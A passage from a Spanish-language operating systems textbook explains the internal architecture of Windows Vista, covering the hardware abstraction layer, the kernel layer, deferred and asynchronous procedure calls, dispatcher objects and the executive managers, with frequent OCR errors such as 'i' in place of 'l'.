(incluyendo los arreglos para cargar el driver de dispositivo apropiado). Gran parte de la informa¬ 
ción de configuración para administrar dispositivos y drivers se mantiene en el grupo masivo de ar¬ 
chivos del registro llamado SYSTEM . El subcomponente de plug-and-play del administrador de 
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E/S mantiene la información sobre el hardware detectado dentro del volátil grupo masivo de archi¬ 
vos HARDWARE, que se mantiene en memoria en vez de en el disco, ya que se recrea por com¬ 
pleto cada vez que se inicia el sistema. 

Ahora examinaremos con un poco más de detalle los diversos componentes del sistema opera¬ 
tivo. 

L a capa de abstracción de hardware 

Al igual que las versiones basadas en NT de Windows, uno de los objetivos de Windows Vista era 
que fuera portable entre varias plataformas de hardware. En teoría, para llevar un sistema operati¬ 
vo a un nuevo tipo de sistema computacional sólo habría que recompilar el sistema operativo con 
un compilador para el nuevo equipo y hacer que lo ejecutara la primera vez. Por desgracia, no es 
tan simple. Aunque muchos de los componentes en algunos niveles del sistema operativo pueden 
ser en gran parte portables (debido a que en su mayoría tratan con estructuras de datos internas y 
abstracciones que aceptan el modelo de programación), otros niveles deben lidiar con los registros 
de dispositivos, las interrupciones, el DMA y otras características del hardware que difieren de ma¬ 
nera considerable entre una máquina y otra. 

La mayor parte del código fuente para el kernel del NTOS está escrito en C, en vez de lengua¬ 
je ensamblador (sólo 2% está en ensamblador en el x86, y menos de 1% en el x64). Sin embargo, 
todo este código en C no se puede simplemente sacar de un sistema x86, ponerse en un sistema 
SPARC (por ejemplo), volverse a compilar y reiniciarse, debido a las diversas diferencias de hard¬ 
ware entre las arquitecturas de los procesadores que no tienen nada que ver con los distintos con¬ 
juntos de instrucciones y que el compilador no puede ocultar. Los lenguajes como C dificultan la 
tarea de abstraer ciertas estructuras de datos de hardware y parámetros, como el formato de las en¬ 
tradas en la tabla de páginas, los tamaños de las páginas de memoria física y la longitud de las pa¬ 
labras, sin producir severos castigos en el rendimiento. Todo esto (junto con muchas optimizaciones 
específicas de cada hardware) se tendría que portar en forma manual, aunque no esté escrito en có¬ 
digo ensamblador. 

Los detalles del hardware sobre la forma en que está organizada la memoria en los servidores 
grandes, o las primitivas de sincronización de hardware disponibles, también pueden tener un gran 
impacto en niveles más altos del sistema. Por ejemplo, el administrador de memoria virtual de NT 
y el nivel del kernel están conscientes de los detalles del hardware relacionados con la caché y la 
localidad de la memoria. NT utiliza las primitivas de sincronización compareS¡ swap en todo el sis¬ 
tema, por lo que sería difícil portarlo a un sistema que no las tuviera. Por último, hay muchas de¬ 
pendencias en el sistema en cuanto al ordenamiento de los bytes dentro de las palabras. En todos 
los sistemas a los que se ha portado NT, el hardware se estableció en el modo littie-endian. 

A demás de estas cuestiones mayores de portabilidad, también hay un gran número de peque¬ 
ñas cuestiones incluso entre las distintas tarjetas principales de distintos fabricantes. Las diferen¬ 
cias en las versiones de las CPUs afectan la forma en que se implementan las primitivas de 
sincronización, como la espera activa. Hay varias familias de chips de soporte que crean diferen¬ 
cias en cuanto a la forma en que se aplica la prioridad a las interrupciones de hardware, la forma 
en que se accede a los registros de los dispositivos de E/S, la administración de las transferencias 
de DMA, el control de los temporizadores y el reloj de tiempo real, la sincronización de los mui- 
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ti procesadores, el trabajo con las herramientas del BIOS como ACPI (Interfaz avanzada de con¬ 
figuración y energía), etcétera. M icrosoft hizo un intento serio por ocultar estos tipos de depen¬ 
dencias de las máquinas en un nivel delgado en la parte inferior, conocido como HAL, como 
vimos antes. El trabajo del HAL es presentar al resto del sistema operativo el hardware abstrac¬ 
to que oculta los detalles específicos sobre la versión del procesador, el conjunto de chips de so¬ 
porte y otras variaciones de la configuración. Estas abstracciones del HAL se presentan en forma 
deservicios independientes de la máquina (llamadas a procedimientos y macros) que NTOS y los 
drivers pueden utilizar. 

Al utilizar los servicios del HAL sin dirigirse al hardware de manera directa, los drivers y el 
kernel requieren menos cambios al portarse a nuevos procesadores: en la mayoría délos casos pue¬ 
den operar sin modificación en sistemas con la misma arquitectura de procesadores, a pesar de las 
diferencias en las versiones y los chips de soporte. 

EI H A L no proporciona abstracciones o servicios para dispositivos de E/S específicos como los 
teclados, ratones, discos o para la unidad de administración de la memoria. Estas herramientas se 
esparcen a través de los componentes en modo de kernel y, sin el HA L, la cantidad de código que 
habría de modificar al momento de portar el sistema operativo sería considerable, incluso si las di¬ 
ferencias actuales en el hardware fueran pequeñas. Es simple portar el mismo HAL, debido a que 
todo el código dependiente de la máquina está concentrado en un solo lugar, y los objetivos del 
puerto están bien definidos: implementar todos los servicios del HAL. En muchas versiones, M i- 
crosoft proporcionaba un Kit de desarrollo del HAL, el cual permitía a los fabricantes de sistemas 
construir su propio HAL para permitir que los demás componentes del kernel funcionaran en los 
nuevos sistemas sin necesidad de modificarlos, siempre y cuando los cambios en el hardware no 
fueran demasiado grandes. 

Como ejemplo de lo que hace el nivel de abstracción de hardware, considere la cuestión de la 
E/S por asignación de memoria en comparación con los puertos de E/S. Algunas máquinas tienen 
una y algunas tienen la otra. ¿Cómo se debe programar un driver: para usar E/S por asignación de 
memoria o no? En vez de forzar una opción por la cual el driver no se podría portar a una máquina 
que utilizara la otra solución, el nivel de abstracción de hardware ofrece tres procedimientos que los 
escritores de drivers pueden utilizar para leer los registros de los dispositivos, y otros tres para es¬ 
cribir en ellos: 

uc = READ_PORT_UCHAR(puerto); WRITE_PORT_UCHART(puerto, uc); 

US = READ_PORT_USHORT(puerto); WRITE_PORT_USHORT(puerto, us); 

ul = READ_PORT_ULONG(puerto); WRITE_PORT_LONG(puerto, ul); 

Estos procedimientos leen y escriben enteros sin signo de 8,16 y 32 bits respectivamente, al puer¬ 
to especificado. Es responsabilidad del nivel de abstracción de hardware decidir si se necesita o no 
la E/S por asignación de memoria. De esta forma, un driver se puede mover sin necesidad de mo¬ 
dificación entre las máquinas que difieran en cuanto a la forma en que se implementan los registros 
de dispositivos. 

Con frecuencia, los drivers necesitan el acceso a dispositivos de E/S específicos para varios 
fines. En el nivel de hardware, un dispositivo tiene una o más direcciones en cierto bus. Como to¬ 
das las computadoras modernas tienen a menudo múltiples buses (ISA, PCI, PCI-X, USB, 1394, 
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etcétera), puede ocurrir que más de un dispositivo iiegue a tener ia misma dirección en distintos 
buses, por io que se necesita aiguna forma de diferenciados. Ei HAL proporciona un servicio pa¬ 
ra identificar dispositivos mediante ia asignación de direcciones de dispositivos reiativos dei bus 
a direcciones iógicas a nivei dei sistema. De esta forma, ios drivers no tienen que iievar ia cuen¬ 
ta de qué dispositivo está conectado a cuái bus. Este mecanismo también protege ios nivei es su¬ 
periores contra ias propiedades de ias estructuras de bus aiternativas y ias convenciones de 
direccionamiento. 

Las interrupciones tienen un probiema simiiar: también son dependientes dei bus. Aquí tam¬ 
bién ei HAL proporciona servicios para denominar ias interrupciones de una forma quesea a nivei 
dei sistema y otros para permitir que ios drivers adjunten rutinas deservicio de interrupciones a ias 
interrupciones de una manera portabie, sin tener que saber nada sobre cuái vector de interrupción 
corresponde a cuái bus. La administración dei nivei de peticiones de interrupción también se mane¬ 
ja en ei HAL. 

Otro de ios servicios dei HAL es estabiecer y administrar ias transferencias de DMA de una 
manera independiente dei dispositivo. Se pueden manejar tanto ei motor de DMA a nivei dei sistema 
como ios motores de DMA sobre tarjetas de E/S específicas. Para hacer referencia a ios dispositi¬ 
vos, se utiiizan sus direcciones iógicas. Ei HAL impiementa ei esparcimiento/recopiiación dei soft¬ 
ware (escribir o ieer en bioques no contiguos de ia memoria física). 

Ei HAL también administra ios reiojes y temporizadores de una manera portabie. Se iieva ia 
cuenta dei tiempo en unidades de 100 nanosegundos, empezando desde enero 1,1601, que es ia pri¬ 
mera fecha en ei cuarto centenario anterior, io cuai simpiifica ios cáicuios dei año bisiesto. (Pregun¬ 
ta rápida: ¿Fue 1800 año bisiesto? Respuesta rápida: No). Los servicios de tiempo desacopian ios 
drivers de ias frecuencias actuaies a ias que operan ios reiojes. 

Aigunas veces, ios componentes dei kernei necesitan sincronizarse a un nivei muy bajo, en es- 
peciai para evitar condiciones de competencia en sistemas de muitiprocesador. Ei HAL proporcio¬ 
na primitivas para administrar esta sincronización como ia espera activa, en ia que una CPU 
simpiemente espera ia iiberación de un recurso retenido por otra CPU, en especiai en situaciones 
donde ei recurso se retiene por i o generai por unas cuantas instrucciones de máquina. 

Por úitimo, una vez que se inicia ei sistema, ei HAL se comunica con ei BIOS e inspecciona ia 
configuración dei sistema para averiguar ios buses y dispositivos de E/S que contiene, y ia forma 
en que se han configurado. Después, esta información se coioca en ei registro. En ia figura 11-14 
se muestra un resumen de aigunas de ias cosas que hace ei HAL. 


La capa del kernei 

Por encima dei nivei de abstracción de hardware está ei NTOS, ei cuai consiste de dos niveies: ei 
kernei y ei ejecutivo. "Kernei" es un término confuso en Windows: se puede referir a todo ei có¬ 
digo que se ejecuta en ei modo de kernei dei procesador, pero también ai archivo ntoskrni.exe que 
contiene a NTOS, ei núcieo dei sistema operativo Windows. O se puede referir a ia capa dei kernei 
dentro de NTOS, que es como io utiiizaremos en esta sección. Inciusive se utiiiza para nombrar ia 
bibiioteca Win32 en modo de usuario que proporciona ias envoituras para ias ñamadas ai sistema 
nativas: kernei32.dii. 
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Registros de Direcciones Espera 

dispositivos de dispositivos Interrupciones DMA Temporizadores activa BIOS 



Nivel de abstracción de hardware 


Figura 11-14. Algunas de las funciones de hardware que maneja el HAL. 

En el sistema operativo Windows, la capa del kernel (que se muestra encima del nivel ejecuti¬ 
vo en la figura 11-13) proporciona un conjunto de abstracciones para administrar la CPU. La abs¬ 
tracción más central es la de los hilos, pero el kernel también impiementa el manejo de excepciones, 
las trampas y varios tipos de interrupciones. La creación y destrucción de las estructuras de datos 
quedan soportea los hilos se implementan en el nivel ejecutivo. La capa del kernel es responsable 
de la planificación y sincronización de los subprocesos. AI tener soporte para los hilos en un nivel 
separado, el nivel ejecutivo se puede implementar mediante el uso del mismo modelo multihilo pre¬ 
ferente que se utiliza para escribir código concurrente en modo de usuario, aunque las primitivas de 
sincronización son mucho más especializadas. 

El planificador de hilos del kernel es responsable de determinar cuál hilo se ejecuta en cada 
CPU del sistema. Cada hilo se ejecuta hasta que una interrupción del temporizador indique que es 
tiempo de cambiar a otro hilo (expiró su quantum), o hasta que el hilo tenga que esperar a que ocu¬ 
rra algo: por ejemplo, que se complete una operación de E/S o que se libere un bloqueo, o que un 
hilo de mayor prioridad pase al estado ejecutable y necesite la CPU. Al cambiar de un hilo a otro, 
el planificador se ejecuta en la C PU y se asegura de guardar el estado délos registros y demás hard¬ 
ware. Después, el planificador selecciona otro hilo para ejecutarlo en la CPU y restaura el estado 
que se había guardado antes, desde la última vez que se ejecutó ese hilo. 

Si el siguiente hilo a ejecutar está en un espacio de direcciones distinto (es decir, otro proceso) 
que el hilo con el que se va a realizar el cambio, el planificador también debe cambiar de espacios 
de direcciones. M ás adelante en este capítulo, cuando lleguemos a los procesos e hilos, analizare¬ 
mos los detalles del mismo algoritmo de planificación. 

Además de proporcionar un mayor nivel de abstracción del hardware y manejar los cambios 
de hilos, el nivel del kernel también tiene otra función clave: proporcionar soporte de nivel bajo 
para dos clases de mecanismos de sincronización, los objetos de control y los objetos despacha¬ 
dor. Los objetos de control son las estructuras de datos que la capa del kernel proporciona co¬ 
mo abstracciones al nivel ejecutivo para administrar la CPU. El ejecutivo los asigna, pero se 
manipulan mediante las rutinas que proporciona la capa del kernel. Los objetos despachadores 
son la clase de objetos ejecutivos ordinarios que utilizan una estructura de datos común para la 
sincronización. 
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L lamadas a procedimientos diferidas 

Los objetos de control incluyen objetos primitivos para hilos, interrupciones, temporizadores, sin¬ 
cronización, creación de perfiles y dos objetos especiales para implementar DPCsy APCs. Los ob¬ 
jetos DPC (Deferred Procedure Cali, Llamada a procedimiento diferido) se utilizan para reducir el 
tiempo requerido para ejecutar ISRs (Interrupt Service Routines, Rutinas de servicio de interrup¬ 
ción) en respuesta a una interrupción de un dispositivo específico. 

El hardware del sistema asigna un nivel de prioridad de hardware a las interrupciones. La CPU 
también asocia un nivel de prioridad con el trabajo que realiza. La CPU responde sólo a las interrup¬ 
ciones con un nivel de prioridad mayor al que utiliza en un momento dado. Los niveles de prioridad 
normales, incluyendo el nivel de prioridad de todo el trabajo en modo de usuario, son 0. Las inte¬ 
rrupciones de dispositivos ocurren en la prioridad 3 o mayor, y la ISR para una interrupción de dis¬ 
positivo se ejecuta por lo general en el mismo nivel de prioridad que la interrupción, para poder evitar 
que ocurran otras interrupciones menos importantes mientras se procesa una más importante. 

Si una ISR se ejecuta demasiado tiempo, se retrasará el servicio de las interrupciones de me¬ 
nor prioridad y tal vez se pierdan datos o se obstaculícela velocidad de transferencia deE/S del sis¬ 
tema. Puede haber varias ISRs en progreso en cualquier momento dado, y cada ISR sucesiva se 
debe a las interrupciones en los niveles de prioridad cada vez más altos. 

Para reducir el tiempo que se invierte en el procesamiento de las ISRs se realizan sólo las ope¬ 
raciones críticas, como capturar el resultado de una operación de E/S y reinicializar el dispositivo. 
El posterior procesamiento de la interrupción se difiere hasta que se reduce el nivel de prioridad de 
la CPU y ya no bloquea el servicio de otras interrupciones. El objeto DPC se utiliza para represen¬ 
tar el trabajo posterior a realizar, y la ISR llama a la capa del kernel para poner en cola la DPC en 
la lista de DPCs para un procesador específico. Si la DPC es la primera de la lista, el kernel regis¬ 
tra una petición especial con el hardware para interrumpir la CPU en la prioridad 2 (a lo cual NT le 
llama el nivel DISPATCH). Cuando se complete la última de las ISRs en ejecución, el nivel de in¬ 
terrupción del procesador regresará a un nivel menor de 2, y se desbloqueará la interrupción para 
procesar la DPC. La ISR para la interrupción de la DPC procesará cada uno de los objetos DPC que 
el kernel haya puesto en cola. 

La técnica de usar interrupciones de software para diferir el procesamiento de las interrupcio¬ 
nes es un método bien establecido para reducir la latencia de las ISRs. UNIX y otros sistemas em¬ 
pezaron a utilizar el procesamiento diferido en la década de 1970 para lidiar con el hardware lento 
y el uso de búfer limitado délas conexiones seriales a las terminales. La ISR tenía que lidiar con el 
proceso de obtener caracteres del hardware y ponerlos en cola. U na vez que se completaba el pro¬ 
cesamiento de todas las interrupciones de nivel superior, una interrupción de software ejecutaría una 
ISR de menor prioridad para realizar el procesamiento de los caracteres, como implementar un ca¬ 
rácter de retroceso para enviar caracteres de control a la terminal y borrar el último carácter visua¬ 
lizado, y desplazar el cursor hacia atrás. 

En la actualidad, un ejemplo similar en Windows es el dispositivo de teclado. Después de opri¬ 
mir una tecla, la ISR del teclado lee el código de la tecla de un registro y después vuelve a habili¬ 
tar la interrupción del teclado, pero no sigue procesando la tecla de inmediato. En vez de ello, utiliza 
una DPC para poner en cola el procesamiento del código de la tecla hasta que se hayan procesado 
todas las interrupciones de dispositivos pendientes. 
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Como las DPCs se ejecutan en el nivel 2, no evitan que se ejecuten las ISRs, pero previenen 
que se ejecute cualquier hilo hasta que se completen las DPCs puestas en cola y se reduzca el nivel 
de prioridad de la CPU a un nivel menor de 2. Los drivers de dispositivos y el sistema en sí deben 
tener cuidado de no ejecutar ISRs o DPCs por mucho tiempo. Como no se permite la ejecución de 
los hilos, las ISRs y las DPCs pueden hacer que el sistema parezca lento, y además producir fallas 
al reproducir música debido al atascamiento de los hilos que escriben en el búfer de música al dis¬ 
positivo de sonido. Otro uso común de las DPCs es para ejecutar rutinas en respuesta a una inte¬ 
rrupción del temporizador. Para evitar el bloqueo de los hilos, los eventos del temporizador que 
necesiten ejecutarse durante un tiempo extendido deben poner en cola las peticiones en la reserva 
de hilos trabajadores que mantiene el kernel paralas actividades en segundo plano. Estos hilos tie¬ 
nen la prioridad de programación 12,13 o 15. Como veremos en la sección sobre programación de 
hilos, estas prioridades significan que los elementos de trabajo se ejecutarán antes que la mayoría 
de los hilos, pero no interferirán con los hilos en tiempo real. 

L lamadas a procedimientos asincronas 

El otro objeto de control especial del kernel es el objetoAPC (llamada a procedimiento asincrona). 
LasAPCs son como las DPCs en cuanto a que difieren el procesamiento de una rutina del sistema, 
pero a diferencia de las DPCs (que operan en el contexto de CPUs específicas) las APCs se ejecu¬ 
tan en el contexto de un hilo determinado. Cuando se procesa una tecla que se oprimió, no importa 
en qué contexto se ejecute la DPC, ya que ésta es sólo otra parte del procesamiento de interrupcio¬ 
nes, y las interrupciones sólo necesitan manejar el dispositivo físico y realizar operaciones indepen¬ 
dientes de los hilos, como grabar los datos en un búfer en espacio de kernel. 

La rutina de la DPC se ejecuta en el contexto de cualquier hilo que haya estado en ejecución 
cuando ocurrió la interrupción original. Llama al sistema de E/S para reportar que se ha completa¬ 
do la operación de E/S, y el sistema de E/S pone en cola una A PC para ejecutarla en el contexto del 
hilo que realiza la petición de E/S original, donde puede acceder al espacio de direcciones en mo¬ 
do de usuario del hilo que procesará la entrada. 

En el siguiente momento conveniente, la capa del kernel entrega la APC al hilo y planifica al 
hilo a ejecutar. UnaAPC está diseñada para tener la apariencia de una llamada inesperada a un pro¬ 
cedimiento, algo parecido a los manejadoras de señales en UNIX. LaAPC en modo de kernel para 
completar la E/S se ejecuta en el contexto del hilo que inició la operación de E/S, pero en modo de 
kernel. Esto permite a la A PC el acceso al búfer en modo de kernel y también a todo el espacio de di¬ 
recciones en modo de usuario, que pertenece al proceso que contiene el hilo. El momento exacto en 
el que se entregará una A PC depende de lo que esté haciendo el hilo en ese momento, e incluso del 
tipo del sistema. En un sistema multiprocesador, el hilo que recibe la APC puede empezar a ejecu¬ 
tarse incluso antes de que la DPC termine su ejecución. 

LasAPCs en modo de usuario también se pueden utilizar para entregar información de la com- 
pleción de una operación de E/S en modo de usuario al hilo que inició la operación de E/S. Las 
APCs en modo de usuario invocan a un procedimiento en modo de usuario designado por la apli¬ 
cación, pero sólo cuando el hilo de destino se ha bloqueado en el kernel y se marca como dispues¬ 
to a aceptarAPCs. El kernel interrumpe la espera del hilo y regresa al modo de usuario, pero con 
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la pila en modo de usuario y los registros modificados, para ejecutarla rutina de despacho de la A PC 
en la biblioteca del sistema ntdll.dll. La rutina de despacho de la A PC invoca a la rutina en modo de 
usuario que la aplicación asoció con la operación de E/S. Además de especificar A PCs en modo 
de usuario como un medio para ejecutar código cuando se completan las operaciones de E/S, la fun¬ 
ción QueueuserAPC de laAPI Win32 permite utilizar APCs para fines arbitrarios. 

El nivel ejecutivo también utilizaA PCs para operaciones distintas de la compleción de E/S. De¬ 
bido a que el mecanismo de la A PC está diseñado con cuidado para entregar APCs sólo cuando es 
seguro hacerlo, se puede utilizar para terminar hilos en forma segura. Si no es un buen momento 
para terminar el hilo, éste habrá declarado que estaba entrando en una región crítica y difirió las en¬ 
tregas de A PCs hasta que salga de ella. Los hilos del kernel se marcan a sí mismos cuando entran 
a regiones críticas para diferir las A PCs antes de adquirir bloqueos u otros recursos, de manera que 
no puedan terminar mientras siguen reteniendo el recurso. 

O bjetos despachador 

El objeto despachador es otro tipo de objeto de sincronización. Es cualquiera de los objetos ordi¬ 
narios en modo de kernel (el tipo al que los usuarios pueden hacer referencia mediante manejado- 
res) que contienen una estructura de datos llamada dispatcher_header, como se muestra en la 
figura 11-15. 


Objeto 


r 

Encabezado del objeto 


Bandera de notificación/sincronización 


Estado señalado 


Encabezado de lista para los hilos en espera 

V 

Datos específicos del objeto 


•DISPATCHER HEADER 


Figura 11-15. La estructura de datos dispatcher_header incrustada en muchos objetos 
ejecutivos (objetos despachador). 


Estos objetos incluyen semáforos, mutexes, eventos, temporizadores con espera, y otros objetos 
que los hilos pueden esperar para sincronizar la ejecución con otros hilos. También incluyen obje¬ 
tos que representan archivos abiertos, procesos, hilos y puertos I PC. La estructura de datos del des¬ 
pachador contiene una bandera que representa el estado señalado del objeto, y una cola de hilos 
que esperan a que se señale el objeto. 

Al igual que los semáforos, las primitivas de sincronización son objetos despachadores natura- 
les.Además, los temporizadores, archivos, puertos, hilosy procesos utilizan los mecanismos de ob¬ 
jetos despachadores para las notificaciones. Cuando se activa un temporizador, la operación de E/S 
se completa en un archivo, hay datos disponibles en un puerto, o termina un hilo o proceso, se se¬ 
ñala el objeto despachador asociado y se despiertan todos los hilos que esperan ese evento. 

Como Windows utiliza un mecanismo unificado simple para la sincronización con los obje¬ 
tos en modo de kernel, no se necesitan APIs especializadas (como waita para esperar los proce- 
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sos hijos en UNIX) para esperar eventos. A menudo, los hilos desean esperar varios eventos a la 
vez. En UNIX, un proceso puede esperar a que los datos estén disponibles en cualquiera de 64 
sockets de red, por medio de la llamada al sistema seiect. En Windows hay unaAPI similar lla¬ 
mada WaitForM ultipleObjects, pero permite que un hilo espere sobre cualquier tipo de objeto 
despachador para el que tenga un manejador. Se pueden especificar hasta 64 manejadoras para 
waitForMuitipieObjects, así como un valor de tiempo límite opcional. El hilo pasa al estado eje¬ 
cutable cada vez que se señala alguno de los eventos asociados con los manejadoras, o cuando 
ocurre el tiempo límite. 

En realidad, el kernel utiliza dos procedimientos distintos para hacer que los hilos esperen a un 
objeto despachador ejecutable. Al señalar un objeto de notificación, todos los hilos que estén en 
espera serán ejecutables. Los objetos de sincronización sólo hacen que el primer hilo en espera sea 
ejecutable, y se utilizan para objetos despachadores que impiementan primitivas de bloqueo, como 
los mutexes. Cuando un hilo que espera un bloqueo empieza a ejecutarse otra vez, lo primero que 
hacees tratar de adquirir el bloqueo de nuevo. Si sólo un hilo puede retener el bloqueo a la vez, to¬ 
dos los demás que se hicieron ejecutables podrían bloquearse de inmediato, con lo cual se produci¬ 
rían muchos cambios de contexto innecesario. La diferencia entre los objetos despachadores que 
utilizan sincronización, en comparación con la notificación, es una bandera en la estructura dispat- 
cher_header. 

Como información adicional, los mutexes en Windows se conocen como "mutantes" en el có¬ 
digo, debido a que tienen que impiementar la semántica de OS/2 de no desbloquearse a sí mismos 
en forma automática cuando termine un hilo que contenga uno de estos mutexes, algo que Cutler 
consideraba estrafalario. 

El nivel ejecutivo 

Como se muestra en la figura 11-13, debajo de la capa del kernel de NTOS está el ejecutivo. El ni¬ 
vel ejecutivo está escrito en C, es en su mayor parte independiente de la arquitectura (el adminis¬ 
trador de memoria es una notable excepción) y se ha portado a nuevos procesadores con sólo un 
esfuerzo modesto (M IPS, x86, PowerPC, Alpha, IA64 y x64). El ejecutivo contiene varios compo¬ 
nentes distintos, los cuales se ejecutan mediante las abstracciones de control que proporciona la ca¬ 
pa del kernel. 

Cada componente se divide en estructuras de datos e interfaces internas y externas. Los aspec¬ 
tos internos de cada componente están ocultos y se utilizan sólo dentro del mismo componente, 
mientras que los aspectos externos están disponibles para todos los demás componentes dentro del 
ejecutivo. Se exporta un subconjunto de las interfaces externas del ejecutablentoskrnl.exe y losdri- 
vers de dispositivos pueden crear vínculos a ellas, como si el ejecutivo fuera una biblioteca. M icro- 
soft llama "gerentes" a muchos de los componentes del ejecutivo, ya que cada uno está a cargo de 
administrar cierto aspecto de los servicios operativos, como la E/S, la memoria, los procesos, los 
objetos, etcétera. 

Al igual que con la mayoría de los sistemas operativos, gran parte de la funcionalidad en el eje¬ 
cutivo de Windows es como el código de biblioteca, excepto porque se ejecuta en modo kernel 
para poder compartir sus estructuras de datos y protegerse del acceso del código en modo de usuario. 
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y por lo tanto puede acceder al estado del hardware privilegiado, como los registros de control de 
la M M U. Pero aparte de eso, el ejecutivo simplemente ejecuta funciones del SO a beneficio del que 
lo llama, y por ende se ejecuta en el hilo del proceso que lo llamó. 

Cuando cualquiera de las funciones del ejecutivo se bloquea en espera de sincronizarse con 
otros hilos, el hilo en modo de usuario también se bloquea. Esto tiene sentido cuando se trabaja a 
beneficio de un hilo en modo de usuario específico, pero puede ser injusto cuando se realiza traba¬ 
jo relacionado con las tareas comunes de mantenimiento. Para evitar sabotear el hilo actual cuando 
el ejecutivo determina que se necesitan ciertas tareas de mantenimiento, se pueden crear varios hi¬ 
los en modo de kernel cuando el sistema se inicia, y se pueden dedicar a tareas específicas, como 
asegurarse que las páginas modificadas se escriban en el disco. 

Para tareas predecibles de baja frecuencia, hay un hilo que se ejecuta una vez por segundo y 
tiene una lista de elementos que debe manejar. Para un trabajo menos predecible está la reserva de 
hilos trabajadores de alta prioridad que mencionamos antes, y que se puede utilizar para ejecutar ta¬ 
reas delimitadas al poner en cola una petición y señalar el evento de sincronización que esperan los 
hilos trabajadores. 

El administrador de objetos administra la mayoría de los objetos interesantes en modo de ker¬ 
nel que se utilizan en el nivel ejecutivo. Éstos incluyen los procesos, hilos, archivos, semáforos, dis¬ 
positivos y driversdeE/S, temporizadoresy muchos otros. Como vimos antes, los objetos en modo 
kernel son en realidad sólo estructuras de datos asignadas y utilizadas por el kernel. En Windows, 
las estructuras de datos del kernel tienen tanto en común que es muy conveniente administrar mu¬ 
chas de ellas en una herramienta unificada. 

Las herramientas que proporciona el administrador de objetos incluyen: administrar la asigna¬ 
ción y liberación de memoria para los objetos, contabilizar las cuotas, dar soporte al acceso a los 
objetos mediante el uso de manejadores, mantener conteos de referencia para las referencias a apun¬ 
tadores y las referencias a manejadoras, dar nombres a los objetos en el espacio de nombres de NT 
y proveer un mecanismo extensible para administrar el ciclo de vida para cada objeto. El adminis¬ 
trador de objetos administra las estructuras de datos del kernel, las cuales necesitan algunas de es¬ 
tas herramientas. Hay otras estructuras de datos, como los objetos de control que utilizan la capa 
del kernel o los objetos que son sólo extensiones de los objetos en modo de kernel, que no son ad¬ 
ministradas por ellos. 

Cada objeto del administrador de objetos tiene un tipo que se utiliza para especificar cómo se 
debe administrar el ciclo de vida de los objetos de ese tipo. Éstos no son tipos en el sentido orien¬ 
tado a objetos, sino sólo una colección de parámetros que se especifican al crear el objeto. Para 
crear un nuevo tipo, un componente del ejecutivo simplemente llama a una API del administrador 
de objetos para crear un nuevo tipo. Los objetos son tan centrales para el funcionamiento de Win¬ 
dows, que en la siguiente sección analizaremos con más detalle el administrador de objetos. 

El administrador deE/S proporciona el marco de trabajo para implementar los drivers de los 
dispositivos de E/S y un número de servicios del ejecutivo específicos para configurar, utilizar y 
realizar operaciones en los dispositivos. En Windows, los drivers de dispositivos no sólo manejan 
los dispositivos físicos, sino que también ofrecen una extensibilidad para el sistema operativo. M u- 
chas funciones que se compilan en el kernel en otros sistemas se cargan de manera dinámica y se 
vinculan mediante el kernel en Windows, incluyendo las pilas de protocolos y los sistemas de ar¬ 
chivos. 
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Las versiones recientes de Windows tienen mucho más soporte para ejecutar drivers de dispo¬ 
sitivos en modo de usuario, y éste es ei modeio preferido para ios nuevos drivers de dispositivos. 
Hay cientos de mi Íes de drivers de dispositivos distintos para Windows Vista, ios cuaies funcionan 
con más de un miiión de dispositivos distintos. Es difícii hacer que todo este código trabaje en for¬ 
ma correcta. Es mucho mejor que ios errores impidan ei acceso a un dispositivo ai faiiar en un pro¬ 
ceso en modo de usuario que tener que hacer una comprobación de errores en ei sistema. Los errores 
en ios drivers de dispositivos en modo de kernei son ia principai fuente de ia temida BSOD (Biue 
Screen of Death, Pantaiia azui de ia muerte), donde Windows detecta un error fatai dentro dei mo¬ 
do de kernei y apaga o reinicia ei sistema. Las BSODs son comparabies a ios pánicos de kernei en 
ios sistemas UNIX. 

En esencia, M icrosoft ha reconocido de manera oficiai io que ios investigadores en ei área de 
ios microkerneis (como M INIX 3 y L4) han conocido durante años: entre más código haya en ei ker¬ 
nei, más errores tendrá. Como ios drivers de dispositivos representan aproximadamente 70% dei có¬ 
digo en ei kernei, entre más drivers se puedan mover a ios proceso en modo de usuario, donde un 
error sóio activará ia faiia de un soio driver (en vez de hacer que faiie todo ei sistema), será mejor. 
Se espera que ia tendencia de mover código dei kernei a ios proceso en modo de usuario se aceiere 
en ios años porvenir. 

Ei administrador de E/S también inciuye ias instaiaciones de piug-and-piay y ia administración 
de energía. Plug-and-play entra en acción cuando se detectan nuevos dispositivos en ei sistema. 
Primero se notifica ai subcomponente de piug-and-piay. Funciona con un servicio (ei administrador 
de piug-and-piay en modo de usuario) para buscar ei driver de dispositivo apropiado y cargado en 
ei sistema. N o siempre es fácii encontrar ei driver de dispositivo correcto y aigunas veces depende 
de un proceso sofisticado para asociar ia versión dei dispositivo de hardware específico con una ver¬ 
sión específica de ios drivers. Aigunas veces, un dispositivo admite una interfaz estándar, ia cuai a 
su vez es aceptada por varios drivers escritos por distintas empresas. 

La administración de energía reduce ei consumo de ia misma en donde sea posibie; extiende ia 
vida de ias baterías en ias portátiiesy ahorra energía en ios equipos de escritorio y servidores. Pue¬ 
de ser difícii administrar ia energía en forma correcta, ya que hay muchas dependencias sutiies en¬ 
tre ios dispositivos y ios buses que ios conectan a ia CPU y ia memoria. Ei consumo de energía no 
sóio se ve afectado por ios dispositivos que están encendidos, sino también por ia veiocidad dei re- 
ioj de ia CPU, que ei administrador de energía también controia. 

En ia sección 11.7 estudiaremos ia E/S con más detaiie; en ia sección 11.8 estudiaremos ei sis¬ 
tema de archivos de NT más importante: NTFS. 

Ei administrador de procesos se encarga de ia creación y terminación de ios procesos e hi- 
ios, inciuyendo ei estabiecimiento de ias directivas y parámetros que ios gobiernan. Pero ios as¬ 
pectos operacionaies de ios hiios se determinan con base en ei nivei dei kernei, que controia ia 
programación y sincronización de ios hiios, así como su interacción con ios objetos de controi co¬ 
mo iasAPCs. Los procesos contienen hiios, un espacio de direcciones y una tabia con ios mane¬ 
jadoras que ei proceso puede utiiizar para hacer referencia a ios objetos en modo de kernei. Los 
procesos también inciuyen ia información que necesita ei pianificador para cambiar entre un espa¬ 
cio de direcciones y otro, y para administrar ia información de hardware específica de cada proce¬ 
so (como ios descriptores de segmentos). En ia sección 11.4 estudiaremos ia administración de 
procesos e hiios. 
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El administrador de memoria del ejecutivo implementa la arquitectura de memoria virtual 
con paginación bajo demanda. Administra la asignación délas páginas virtuales a los marcos de pá¬ 
ginas físicas, la administración de los marcos físicos disponibles y la administración del archivo de 
paginación en el disco que se utiliza para respaldar las instancias privadas de las páginas virtuales 
que ya no se cargan en memoria. El administrador de memoria también provee herramientas espe¬ 
